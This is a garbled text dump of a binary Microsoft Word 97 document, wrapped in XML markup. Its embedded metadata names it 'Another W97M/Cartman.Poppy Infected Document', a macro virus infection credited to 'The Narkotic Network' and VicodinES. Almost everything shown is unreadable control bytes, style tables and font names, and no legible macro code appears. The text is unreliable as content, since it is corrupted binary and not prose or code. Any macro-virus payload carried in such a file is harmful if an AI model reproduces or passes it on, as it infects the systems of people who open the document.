;##P;##?=##?=##?=##?=##?=###&gt;##.&gt;##X&gt;##Y&gt;##x&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##.?##3?##C?##O?##d?##l?##??##??##??##??##??##??##??##??##??##??##??##??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!@##%@##*@##0@##@@##D@##k@##o@##t@##@##?@##?@##?@##?@##?@##?@##?@##?@###A###A###A##+A##RA##TA##VA##ZA##{A##?A##?A##?A##?A##?A##dB##?B##?B##?C##?C##?C##?C##?D##?D##?D##?D##^E##_E##eE##fE##YF##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?####@#######?#######0###Another W97M/Cartman.Poppy Infected Document########0###Macro Virus Infection by The Narkotic Networ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icodinES#######0### | VicodinES | Klonopin.Jones | Fastin.Blee | ######H###Hello from VicodinES and The Narkotic Network ... we mean you no harm###########Normal##########island##########2###########Microsoft Office Word###@###########@####8?&gt;??#@####$?5???#@####$?5???#############?</w:t>
        <w:br/>
        <w:t>######C&lt;##################??###########################???.##??##+,??D####???.##??##+,??####?###########`#######h#######?#######?#######?#######?#######?#######?#######?#######?#######?#######?###########?????????############ #######?#######$#######?F#######'##################################p########### #######:#######B###############_PID_LINKBASE#####?###A###"###w#w#w#.#c#h#i#n#a#s#b#a#.#n#e#t#########??#</w:t>
        <w:br/>
        <w:t>##????#</w:t>
        <w:tab/>
        <w:t>######?######F####Microsoft Office Word ???#</w:t>
        <w:br/>
        <w:t>###MSWordDoc#####Word.Document.8#?9?q###############################################################################################?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###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F##?F##?F##?F##?F##?F##?F##?F###G##!G###G##-G##1G##2G##3G##=G##&gt;G##?G##DG##EG##?G##?G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,###3###@###I###[###?###?###?###?###?###?###?###?###?###?###?###?###?###f###g###n###o###?###?###?###?###?###?###################%###&amp;###&lt;###?###E###I###?###?###?###?###################.###1###y###z###?###?###?###?###?###?###########!###"###'###(###Y###Z###?###?###?###?######?###?###?###?###?###?###?###?###?###D###E###?###?###?###?###?###?###?###?###?###?###?####</w:t>
        <w:tab/>
        <w:t>###</w:t>
        <w:tab/>
        <w:t>###</w:t>
        <w:tab/>
        <w:t>###</w:t>
        <w:tab/>
        <w:t>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5</w:t>
        <w:tab/>
        <w:t>##7</w:t>
        <w:tab/>
        <w:t>##W</w:t>
        <w:tab/>
        <w:t>##Y</w:t>
        <w:tab/>
        <w:t>##z</w:t>
        <w:tab/>
        <w:t>##}</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##J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####"#######?###?###?#######*###U###]###`###?###?###?###?###?###?###B###^###g###i###p###?###?###?###?###?###?###?############################################### #######$###'###)###+###M###O###o###q###?###?###?###?#######:###;###N###P###o###p###?###?###$###%###?###?###?###########&amp;###+###,###.###/###:###J###P###Q###T###U###`###p###v###w###z###{###?###?###?###?###?###?###?###?###########?###?###?###?###?###?###########6###7###?###@###?###?###?###?###?###?###!###"###?###@###H###I###?###?###?###?###?###?###*###+###I###J###R###T###?###?###?###?###?###?###################,###-###=###&gt;###N###O###a###c###k###t###?###?###?###?###?###?###?###?###?###?###?###?#######</w:t>
        <w:tab/>
        <w:t>###########+###,###?###@###H###P###Z###\###~######?###?###?###?###?###?###########/###0###L###M###i###k###p###q###?###?###?###?###?###?###?###?###?###?###?###?###D###E###f###g###?###?###########?###?###? ##? ##? ##? ##4!##D!##W!##X!##?!##?!##?!##?!##R"##S"##?"##?"##?"##?"##########A###B####$###$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$###%##</w:t>
        <w:tab/>
        <w:t>%###%###%###%##s%##t%##?%##?%##"&amp;###&amp;##?&amp;##?&amp;##?&amp;##?&amp;###'###'##V'##W'##?'##?'##?'##?'###(##P(##v(##w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)##+)##H)##L)##c)##h)##?)##?*##?*##g+##h+##?+##?+##?+##?+##?+##?+###,## ,##&amp;,##y,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,###-###-###-###-###-###-## -##$-##--##/-##7-##9-##J-##K-##n-##o-##u-##?-##?-##?-##?-###.##^.##_.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.###/###/###/###/###/##(/##3/##?/##?/##?/##?/##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0###0##M0##V0##{0##?0##?0##?0##&amp;1##'1##h1##r1##?1##?1##{2##|2##=3##&gt;3##+4##,4##E5##F5##z6##{6##?6##?6###7###7###7###7##?7##?7##?7##?7##&gt;8##?8##C8##D8##?8##?8##?8##?8##B9##E9##O9##P9##X9##Y9##3:##5:##j:##k:##?:##?:##?:##?:##?:##';##9;##;;##k;##l;###&lt;###&lt;##8&lt;##9&lt;##g&lt;##h&lt;##?&lt;##?&lt;##N=##O=##h=##i=##?=##?=##?=##?=##?=##?=##?=##?=##$&gt;##%&gt;##X&gt;##Y&gt;##&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;###?###?###?##</w:t>
        <w:tab/>
        <w:t>?##</w:t>
        <w:br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!?##"?##'?##(?##+?##.?##3?##C?##O?##d?##l?##??##??##??##??##??##??##??##??##??##??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!@##%@##*@##0@##@@##D@##k@##o@##t@##@##?@##?@##?@##?@##?@##?@##?@###A###A###A##IA##TA##VA##yA##{A##?A##?A##?A##?A##?A###B##</w:t>
        <w:br/>
        <w:t>B###B##2B##4B##AB##BB##VB##WB##cB##dB##?C##?C##?C##?C##?D##?D##?D##?D##^E##_E##eE##fE##YF##ZF##gF##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##!G###G##-G##3G##=G##DG##EG##FG##IG##KG##NG##PG##SG##UG##XG##ZG##^G##`G##fG##hG##kG##mG##rG##tG##wG##yG##|G##~G##?G##?G##?G##?G##?G##?G##?G##?G##?G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##B###I###]###?###?###?###e###o###r###{###?###?###?###?###########?###E###?###?###?###?</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>######%###2###Q###^###}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^###h###i###?###?###?###?#######;###P#######%###?###?###?###?#######/###;###U###a###{###?###?###1###8###7###@###?###?###?###?###c###t###?###?###?###?###@###P######?#######/###?###?###)!##5!##?$##?$##?$###%##{&amp;##?&amp;##?&amp;##?&amp;###(###(##</w:t>
        <w:tab/>
        <w:t>(##O(##?(###)##,)##y)##U+##g+## ,##x,##?,##9-##o-##?-##?-##?-##?.##3/##r7##?7##?8##D8##?:##?:##?;###&lt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##C?##P?##??##??##??##??##??##??##??##??##;@##&lt;@##Z@##]@##t@##?@##?@##?@##?@##?@##?@##?@##?@##IA##UA##WB##dB##?C##?C##?D##?D##_E##fE##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##-G##.G##1G##3G##=G##@G##DG##EG##FG##IG##KG##NG##PG##SG##UG##XG##ZG##^G##`G##fG##hG##kG##mG##rG##tG##wG##yG##|G##~G##?G##?G##?G##?G##?G##?G##?G##?G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</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>######%###2###Q###^###}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#,## ,##x,##y,##?,##?,##J-##K-##n-##o-##?-##?-###&lt;###&lt;##g&lt;##h&lt;##?&lt;##?&lt;##N=##O=##h=##i=##?=##?=##?=##?=##?=##?=##?=##?=##?=##?=##?=##?=##?&gt;##?&gt;##?&gt;##?&gt;##H@##k@##?@##?@##?@##?@##?@##?@##?@##?@##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F###G###G##DG##EG##EG##FG##?G##?G##################################################################################################################################################################################################################z;`#p??#?#?#?#?#?#?#?#?#?###?#####</w:t>
        <w:tab/>
        <w:t>#?###################\#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##</w:t>
        <w:tab/>
        <w:t>#?###################G9##`,P#?###################2#?!??#?#?#?#?#?#?#?#?#?###?V?"?Z???#?#?#?#?#?#?#?#?###_Wg'?|d/?#?#?#?#?#?#?#?#?###?#95R_?)?#?#?#?#?#?#?#?#?###gR97&gt;B#??#?#?#?#?#?#?#?#?###?#????0??#?#?#?#?#?#?#?#?###?2?S#[?L?#?#?#?#?#?#?#?#?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TL?#4?###################yX\V##</w:t>
        <w:tab/>
        <w:t>#?###################?#?`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#?#?#?#?#?#?#?#?###pk_rr??e?#?#?#?#?#?#?#?#?###?mUz?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?#?#?#?#?#?#?#?#?##############################?#??##?0?^??#`?0?o(#sH</w:t>
        <w:tab/>
        <w:t>####?##</w:t>
        <w:tab/>
        <w:t>?#####?#######################?(##?\?^?(#`?\?####)######?#######################??##?\?^??#`?\?####.######?#######################?p##?\?^?p#`?\?####.######?#######################?#</w:t>
        <w:br/>
        <w:t>#?\?^?#</w:t>
        <w:br/>
        <w:t>`?\?####)######?#######################??##?\?^??#`?\?####.######?#######################?\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?\?^?\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>`?\?####.######?#######################?###?\?^?##`?\?####)######?#######################??##?\?^??#`?\?####.##############################??##?W?#?###?##^??#`?W?####.##############################??##?W?#?###?##^??#`?W?####.##############################?;##???#?###;##^?;#`???o(######0###########################;#?8##? ?^?8#`? ?^J##o(######0#####?#######################??##?\?^??#`?\?^J######)######?#######################?D##?\?^?D#`?\?^J######.######?#######################??##?\?^??#`?\?^J######.######?#######################??</w:t>
        <w:br/>
        <w:t>#?\?^??</w:t>
        <w:br/>
        <w:t>`?\?^J######)######?#######################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\?^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\?^J######.######?#######################??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?\?^??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>`?\?^J######.######?#######################?x##?\?^?x#`?\?^J######)######?#######################?###?\?^?##`?\?^J######.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???o(#####.############################?#?(##?0?^?(#`?0?^J##o(####?##</w:t>
        <w:tab/>
        <w:t>?#####?#######################??##?\?^??#`?\?^J######)######?#######################?D##?\?^?D#`?\?^J######.######?#######################??##?\?^??#`?\?^J######.######?#######################??</w:t>
        <w:br/>
        <w:t>#?\?^??</w:t>
        <w:br/>
        <w:t>`?\?^J######)######?#######################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\?^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\?^J######.######?#######################??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?\?^??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>`?\?^J######.######?#######################?x##?\?^?x#`?\?^J######)######?#######################?###?\?^?##`?\?^J######.##############################?###???#?######^?##`???OJ##PJ##o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?##################</w:t>
        <w:br/>
        <w:t>####??##?\?#?###?##^??#`?\??h####?H######)######?##################</w:t>
        <w:br/>
        <w:t>####??##?\?#?###?##^??#`?\??h####?H######.######?##################</w:t>
        <w:br/>
        <w:t>####?9##?\?#?###9##^?9#`?\??h####?H######.######?##################</w:t>
        <w:br/>
        <w:t>####??</w:t>
        <w:tab/>
        <w:t>#?\?#?###?</w:t>
        <w:tab/>
        <w:t>#^??</w:t>
        <w:tab/>
        <w:t>`?\??h####?H######)######?##################</w:t>
        <w:br/>
        <w:t>####??##?\?#?###?##^??#`?\??h####?H######.######?##################</w:t>
        <w:br/>
        <w:t>####?%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?\?#?###%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#^?%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>`?\??h####?H######.######?##################</w:t>
        <w:br/>
        <w:t>####??##?\?#?###?##^??#`?\??h####?H######)######?##################</w:t>
        <w:br/>
        <w:t>####?m##?\?#?###m##^?m#`?\??h####?H######.##############################??##???#?###?##^??#`???o(#####.############################1#??##?\?^??#`?\?####.######?#######################?H##?\?^?H#`?\?####)######?#######################??##?\?^??#`?\?####.######?#######################??##?\?^??#`?\?####.######?#######################?4##?\?^?4#`?\?####)######?#######################??</w:t>
        <w:tab/>
        <w:t>#?\?^??</w:t>
        <w:tab/>
        <w:t xml:space="preserve">`?\?####.######?#######################?|##?\?^?|#`?\?####.######?#######################? </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">#?\?^? </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>`?\?####)######?#######################??##?\?^??#`?\?####.##############################??##???#?###?##^??#`???o(#####.##############################??##???#?###?##^??#`???o(#####.##############################??##?W?#?###?##^??#`?W?####.############################?#??##?\?^??#`?\?OJ##QJ##o(###l?#####?#######################?*##?\?^?*#`?\?OJ##QJ##o(###n?#####?#######################??##?\?^??#`?\?OJ##QJ##o(###u?#####?#######################?r##?\?^?r#`?\?OJ##QJ##o(###l?#####?#######################?#</w:t>
        <w:br/>
        <w:t>#?\?^?#</w:t>
        <w:br/>
        <w:t>`?\?OJ##QJ##o(###n?#####?#######################??##?\?^??#`?\?OJ##QJ##o(###u?#####?#######################?^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?\?^?^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>`?\?OJ##QJ##o(###l?#####?#######################?###?\?^?##`?\?OJ##QJ##o(###n?#####?#######################??##?\?^??#`?\?OJ##QJ##o(###u?</w:t>
        <w:tab/>
        <w:t>############################??##???#?###?##^??#`???PJ##o(#####.######?##################</w:t>
        <w:br/>
        <w:t>####??##?\?#?###?##^??#`?\??h####?H######)######?##################</w:t>
        <w:br/>
        <w:t>####?d##?\?#?###d##^?d#`?\??h####?H######.######?##################</w:t>
        <w:br/>
        <w:t>####?###?\?#?######^?##`?\??h####?H######.######?##################</w:t>
        <w:br/>
        <w:t>####??##?\?#?###?##^??#`?\??h####?H######)######?##################</w:t>
        <w:br/>
        <w:t>####?P</w:t>
        <w:br/>
        <w:t>#?\?#?###P</w:t>
        <w:br/>
        <w:t>#^?P</w:t>
        <w:br/>
        <w:t>`?\??h####?H######.######?##################</w:t>
        <w:br/>
        <w:t>####??##?\?#?###?##^??#`?\??h####?H######.######?##################</w:t>
        <w:br/>
        <w:t>####??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?\?#?###?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#^??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&lt;##?\?#?###&lt;##^?&lt;#`?\??h####?H######.#################?############?###???#?######^?##`???o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?##################</w:t>
        <w:br/>
        <w:t>####??##?\?#?###?##^??#`?\??h####?H######)######?##################</w:t>
        <w:br/>
        <w:t>####??##?\?#?###?##^??#`?\??h####?H######.######?##################</w:t>
        <w:br/>
        <w:t>####?9##?\?#?###9##^?9#`?\??h####?H######.######?##################</w:t>
        <w:br/>
        <w:t>####??</w:t>
        <w:tab/>
        <w:t>#?\?#?###?</w:t>
        <w:tab/>
        <w:t>#^??</w:t>
        <w:tab/>
        <w:t>`?\??h####?H######)######?##################</w:t>
        <w:br/>
        <w:t>####??##?\?#?###?##^??#`?\??h####?H######.######?##################</w:t>
        <w:br/>
        <w:t>####?%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?\?#?###%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#^?%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>`?\??h####?H######.######?##################</w:t>
        <w:br/>
        <w:t>####??##?\?#?###?##^??#`?\??h####?H######)######?##################</w:t>
        <w:br/>
        <w:t>####?m##?\?#?###m##^?m#`?\??h####?H######.#####gR97############?2?S############?V?"#########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T############G9##############?###############\#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>############yX\V############?#?`############?mUz############pk_r############?#95############z;`#############_Wg'############?#??############2#?!############??????????????????????????????????????????????????????????????????####################################??######?W#H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Fs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6v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P^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4bP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?#################*C?7##############7k?:###########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#############?#?&gt;################?G##############z#?J##############?1?P##############?`?Z##############X`?m###############"wn##############&gt;e)y##############/j?##############z###########?#######y###?!##7$##?###?!##?#</w:t>
        <w:br/>
        <w:t>#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##?\##? ###@##&amp;,###&lt;##R###?u##?.##?###t! #?"%#JQ%#z!(##_(#?~)#$7-#N*1#n61#?l7#r5:#?i:##$;# :;###?#^&gt;@#?HC#??F#}tI#?&lt;K#NHK#&amp;4P#?yS#?eV#?#Y# 3_#?Ca#?/d#?Dd#37e#?Wf#??l#n#n#?0n##(o#?&amp;p#?p#?Eq#?#r#?W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?#t###t#?</w:t>
        <w:tab/>
        <w:t>y#q6y#?#?#p#?#pY?##M?#j+?#g#?#?L?#?[?#?g?###?#O-?#w3?#?#?#7,?#?]?#?2?#-h?#?J?#?f?#1L?#wP?#,$?#?G?#?-?#?#?#?Y?#</w:t>
        <w:br/>
        <w:t>#?#?x?#?k?#?}?#CW?#?y?#pU?#v#?##Q?#?l?#?A?#?u?#U&gt;?#SY?#q(?#?B?#4B?#@k?#?n?#ZC?#&lt;a?##Y?###?#?$?#?X?#?e?#?#?#?h?#m#?#?/?#B:?#oU?#?T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# ###!###&amp;###-###.###3###A###B###I###\###]###d###r###s###z###?###?###?###?###?###?###?###?###?###?###?###?###?####</w:t>
        <w:tab/>
        <w:t>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!</w:t>
        <w:tab/>
        <w:t>##'</w:t>
        <w:tab/>
        <w:t>##-</w:t>
        <w:tab/>
        <w:t>##4</w:t>
        <w:tab/>
        <w:t>##5</w:t>
        <w:tab/>
        <w:t>##8</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##D</w:t>
        <w:tab/>
        <w:t>##J</w:t>
        <w:tab/>
        <w:t>##P</w:t>
        <w:tab/>
        <w:t>##V</w:t>
        <w:tab/>
        <w:t>##W</w:t>
        <w:tab/>
        <w:t>##Z</w:t>
        <w:tab/>
        <w:t>##a</w:t>
        <w:tab/>
        <w:t>##f</w:t>
        <w:tab/>
        <w:t>##l</w:t>
        <w:tab/>
        <w:t>##r</w:t>
        <w:tab/>
        <w:t>##y</w:t>
        <w:tab/>
        <w:t>##z</w:t>
        <w:tab/>
        <w:t>##~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###S###U###i###q###x###|###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?#######################%###4###C###P###Q###R###X###g###v###?###?###?###?###?###?###?###?###?###?################### ###$###(###)###,###3###9###?###E###L###M###P###W###\###b###h###n###o###r###y###~###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?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&amp;###,###/###;###G###H###J###Q###U###a###m###n###p###w###{###?###?###?###?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$###%###%##</w:t>
        <w:br/>
        <w:t>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%###%###%###%###%###%###%###%##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>)###)##,)##3)##7)##;)##?)##C)##G)##H)##M)##Q)##U)##Y)##])##b)##c)##i)##l)##o)##r)##u)##x)##y)##?+## ,##',##+,##/,##3,##7,##;,##&lt;,##A,##G,##M,##S,##Y,##_,##`,##f,##g,##k,##o,##s,##w,##x,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,###-###-##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>-###-###-###-###-##!-##$-##.-##8-##9-##o-##v-##z-##~-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?.##?.##?.##?.##?.##?.##?.##?.###/###/###/###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/###/###/###/###/###/###/##"/###/##)/##-/##./##2/##3/##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0##'1##?1##|2##&gt;3##?6##49##P9##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;###?###?###?##"?##,?##-?##.?##4?##9?##:?##;?##&lt;?##=?##&gt;?##??##@?##A?##B?##C?##P?##S?##U?##W?##Y?##[?##]?##_?##`?##b?##c?##d?##m?##p?##r?##t?##v?##x?##z?##|?##}?##?##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??###@###@###@###@###@##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>@###@###@###@###@###@###@###@###@###@## @##!@##&amp;@##*@##1@##3@##5@##7@##9@##;@##&lt;@##&gt;@##?@##@@##E@##I@##K@##M@##O@##Q@##S@##U@##V@##X@##Y@##Z@##[@##\@##]@##_@##a@##c@##d@##f@##g@##i@##j@##k@##p@##t@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?F##?F##?F##?F##?F##DG##?G##########################?###########?###########?###########?###########?###########?###########?###w?#0####################################?###########################?###########################?###########################?###########################?###########################?###=B#0####################################?#######################?#######################?#######################?#######################?#######################?#######################?###a2##############################?###########################?###########################?###########################?###########################?###########################?###################################?#######################?#######################?#######################?#######################?###################?###################?###################?###################?###a2##################################?###########################?###########################?#####?#############################?###########################?###########################?###y2######################?###################?###################?###################?###################?###################?###################?###############################?###########################?###########################?###7?%0####################?###################?###################?###################?###################?####?##s??#a2##########a2##e??#####-%Y.################################################?###############################################?###############################################?###############################################?###############################################?###############################################?###############################################?###############################################?###############################################?###############################################?###############################################?###############################################?###############################################?###############################################?###############################################?###############################################?###########################?@#?##########??w##############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$##?G##`#######`## ####`##"####`##&amp;####`##*####`##.####`##6####`##8####`##:####`##&lt;####`##D####`##?####??######U#n#k#n#o#w#n#??##############??######??####??####??####??########G#?#############?z# ###?########?#######T#i#m#e#s# #N#e#w# #R#o#m#a#n###5#?################################?####S#y#m#b#o#l###3&amp;?#############?z# ###?########?#######A#r#i#a#l###;#?#?###################################?SO##S#i#m#H#e#i###35?#?####</w:t>
        <w:tab/>
        <w:t>##############################??fN##?[SO##;5?#?####</w:t>
        <w:tab/>
        <w:t>##############################wiSO_#G#B#2#3#1#2###;#?#?###################################?[SO##S#i#m#S#u#n###;#?################################?####W#i#n#g#d#i#n#g#s### ###1#?###?#?#h#####?&lt;#G?&lt;#GX\8f######?</w:t>
        <w:br/>
        <w:t>##C&lt;####$#######?###?</w:t>
        <w:br/>
        <w:t>##C&lt;####$###?#######!#########-###!#)#,#.#:#;#?#]#}#?#?#?#?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?################################################################################################################(#[#{#?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??##################################################################?#i###??########d#######?F##?F################################################?###?#############{######2?Q####??############################HX#####??####?##?###-##???????????????????$?#####2#################??########,#A#n#o#t#h#e#r# #W#9#7#M#/#C#a#r#t#m#a#n#.#P#o#p#p#y# #I#n#f#e#c#t#e#d# #D#o#c#u#m#e#n#t#-#M#a#c#r#o# #V#i#r#u#s# #I#n#f#e#c#t#i#o#n# #b#y# #T#h#e# #N#a#r#k#o#t#i#c# #N#e#t#w#o#r#k#.# #|# #V#i#c#o#d#i#n#E#S# #|# #K#l#o#n#o#p#i#n#.#J#o#n#e#s# #|# #F#a#s#t#i#n#.#B#l#e#e# #|# ###</w:t>
        <w:tab/>
        <w:t>#V#i#c#o#d#i#n#E#S###i#s#l#a#n#d#####################L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